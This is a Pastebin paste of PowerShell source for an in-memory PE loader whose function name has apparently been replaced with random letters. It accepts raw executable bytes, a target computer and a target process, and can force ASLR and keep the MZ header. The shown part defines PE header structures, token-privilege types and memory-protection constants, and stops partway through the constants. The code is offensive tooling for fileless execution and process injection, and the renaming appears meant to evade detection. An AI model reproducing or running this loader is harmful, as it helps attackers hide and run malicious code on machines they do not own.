Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- function Invoke-COVDQSQKASLYKYN
- {
- [CmdletBinding()]
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [ValidateNotNullOrEmpty()]
- [Byte[]]
- $PEBytes,
- [Parameter(Position = 1)]
- [String[]]
- $ComputerName,
- [Parameter(Position = 2)]
- [ValidateSet( 'WString', 'String', 'Void' )]
- [String]
- $FuncReturnType = 'Void',
- [Parameter(Position = 3)]
- [String]
- $ExeArgs,
- [Parameter(Position = 4)]
- [Int32]
- $ProcId,
- [Parameter(Position = 5)]
- [String]
- $ProcName,
- [Switch]
- $ForceASLR,
- [Switch]
- $DoNotZeroMZ
- )
- Set-StrictMode -Version 2
- $RemoteScriptBlock = {
- [CmdletBinding()]
- Param(
- [Parameter(Position = 0, Mandatory = $true)]
- [Byte[]]
- $PEBytes,
- [Parameter(Position = 1, Mandatory = $true)]
- [String]
- $FuncReturnType,
- [Parameter(Position = 2, Mandatory = $true)]
- [Int32]
- $ProcId,
- [Parameter(Position = 3, Mandatory = $true)]
- [String]
- $ProcName,
- [Parameter(Position = 4, Mandatory = $true)]
- [Bool]
- $ForceASLR
- )
- Function Get-Win32Types
- {
- $Win32Types = New-Object System.Object
- $Domain = [AppDomain]::CurrentDomain
- $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
- $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
- $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
- $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
- $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
- $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
- $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
- $MachineType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
- $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
- $MagicType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
- $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
- $SubSystemType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
- $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
- $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
- $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
- $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
- $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
- $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
- $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
- $DllCharacteristicsType = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
- ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
- ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
- $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
- $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
- $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
- ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
- ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
- ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
- ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
- ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
- ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
- ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
- ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
- ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
- ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
- ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
- ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
- ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
- ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
- ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
- ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
- ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
- ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
- ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
- ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
- ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
- ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
- ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
- ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
- ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
- ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
- ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
- ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
- ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
- ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
- ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
- ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
- ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
- ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
- ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
- ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
- ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
- ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
- ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
- ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
- $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
- ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
- ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
- ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
- ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
- ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
- ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
- ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
- ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
- ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
- ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
- ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
- ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
- ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
- ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
- ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
- ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
- ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
- ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
- ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
- ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
- ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
- ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
- ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
- ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
- ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
- ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
- ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
- ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
- ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
- ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
- ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
- ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
- ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
- ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
- ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
- ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
- ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
- ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
- ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
- ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
- ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
- ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
- ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
- $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
- $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
- $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
- $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
- $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
- $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
- $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
- $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
- $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
- $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
- $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
- $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
- $e_resField.SetCustomAttribute($AttribBuilder)
- $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
- $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
- $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
- $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
- $e_res2Field.SetCustomAttribute($AttribBuilder)
- $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
- $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
- $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
- $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
- $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
- $nameField.SetCustomAttribute($AttribBuilder)
- $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
- $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
- $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
- $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
- $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
- $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
- $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
- $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
- $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
- $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
- $LUID = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
- $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
- $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
- $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
- $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
- $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
- $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
- $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
- $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
- $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES
- return $Win32Types
- }
- Function Get-Win32Constants
- {
- $Win32Constants = New-Object System.Object
- $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
- $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
